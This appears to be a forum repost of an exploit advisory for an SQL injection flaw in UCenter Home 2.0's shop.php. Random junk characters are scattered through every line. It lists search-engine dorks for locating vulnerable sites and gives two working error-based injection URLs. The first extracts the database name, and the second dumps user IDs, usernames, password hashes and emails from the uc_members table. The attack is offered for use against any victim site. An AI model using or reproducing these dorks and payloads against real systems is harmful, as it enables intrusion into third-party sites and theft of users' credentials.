4 `" ]( ]. J$ i! D8 m
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ : z3 U5 x% _2 g. C
2 d, a, q. }& P$ k; }, P4 R2 I
6 C7 J- _, A1 R+ J0 G" {
) ]0 B0 q" N5 E5 G. Z*/ Author : KnocKout
* d7 n" f& J7 r6 W
R! a2 |% D- k( h8 f: W*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers * {1 O/ N# @- v0 K+ Z4 r" R% k
9 u7 w' }: T! c8 W4 ]
*/ Contact: [email protected] , l" p6 ^/ c$ F/ n. P( U6 W6 j+ V
- Z$ Z; k- O8 s4 `4 w' g*/ Cyber-Warrior.org/CWKnocKout
b. O' I& |2 B- v$ a2 `5 B
( N% j4 e; M7 k; E__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / X/ T& l$ b! P
8 b) z% G8 W8 O2 W A* JScript : UCenter Home 9 g% F% C: ?6 _4 a
2 [5 }4 B0 C5 R! d7 r9 e6 T& U9 _Version : 2.0
( k) E+ J" t1 ?& f u6 S, T
9 Y( z" N( i& r6 {4 _Script HomePage : http://u.discuz.net/ 2 Y ]/ G# a5 ~3 ~$ \
$ x3 q* Z# }7 [' n) C d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' M( _8 P; I* D. B' l" }4 Y D0 x
Dork : Powered by UCenter inurl:shop.php?ac=view 9 h9 W4 Z% G- Q+ ]; ]& \9 e4 ] U
8 b/ E8 G# s* y4 R- ]
Dork 2 : inurl:shop.php?ac=view&shopid=
, f+ c) H' [" o) x& t
# s+ f% \6 n% n# P, J__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: S- s+ v9 I Q/ L5 p2 F
9 j2 d+ u2 t J. `; b- KVuln file : Shop.php
, ~% f B4 n% w* I% w: B
: A7 s8 C3 _ E) \: gvalue's : (?)ac=view&shopid=
; M+ _$ u/ Z( ?) b
8 \( T h- N' R$ J/ [: LVulnerable Style : SQL Injection (MySQL Error Based) 9 U6 E }* [+ ?' h8 F5 |, s# h; l& _. O" Q
4 I% ~0 `8 J& X+ C
Need Metarials : Hex Conversion P' |: a, n7 a
7 r$ F, c% @1 R U$ q# \/ i+ K__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( a ]# V# u$ \7 k4 p; a. c
4 ?" m8 V: I) {' [8 Z5 `! NYour Need victim Database name.
# n$ M6 Z6 v$ _( u6 W0 A1 W: O( Z6 [( N# z
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * C* m, o8 ^: n! H& j2 q: f
A# [4 B5 L" ]% k7 Q* a
.. : Q* r% n: N, a# a7 q7 \* N
; U4 \9 i: o, b7 A% m: A* f
DB : Okey. , \: c3 G) D# b( N( x
. e v& @1 T* {' _, J% t1 m5 W2 _your edit DB `[TARGET DB NAME]` 5 y @8 u3 G3 n' B/ v3 H
e: g$ U" O8 h9 [6 R( uExample : 'hiwir1_ucenter' 9 [: r2 J9 N" D8 k+ ~* k
: s' g$ t6 ^' i) ^0 v7 Y
Edit : Okey.
! j& i5 Z! m. |2 j# w& x
6 ]! ~+ P- p4 h/ YYour use Hex conversion. And edit Your SQL Injection Exploit..
" B. F; L; [( t0 ~) y5 T8 j0 F
* O0 L( Y( Q$ B; Q6 o
8 x ^2 U: [8 e& u9 e: b" B% `- ?% b1 d' B
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ) }" Q6 }3 C) x* a* z e; L
|
发表于 2013-2-27 21:31:31
收藏
分享
支持
反对